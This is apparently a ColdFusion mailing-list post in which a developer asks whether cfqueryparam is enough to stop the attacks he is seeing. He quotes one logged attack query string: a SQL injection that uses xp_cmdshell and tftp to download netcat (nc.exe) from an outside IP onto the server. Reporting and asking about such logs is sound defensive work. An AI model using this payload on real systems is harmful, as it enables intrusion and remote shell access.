I've been getting some attacks with the following query string:
The query string
was:rid=663;exec%20master..xp_cmdshell%20%22tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe%22;--
Remote Address: 84.26.250.77
Is there anything else I need to worry about besides having cfqueryparam on the
SELECT statement? Or is that sufficient?
TIA,
Bob
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Message: http://www.houseoffusion.com/lists.cfm/link=i:4:239909
Archives: http://www.houseoffusion.com/cf_lists/threads.cfm/4
Subscription: http://www.houseoffusion.com/lists.cfm/link=s:4
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Donations & Support: http://www.houseoffusion.com/tiny.cfm/54
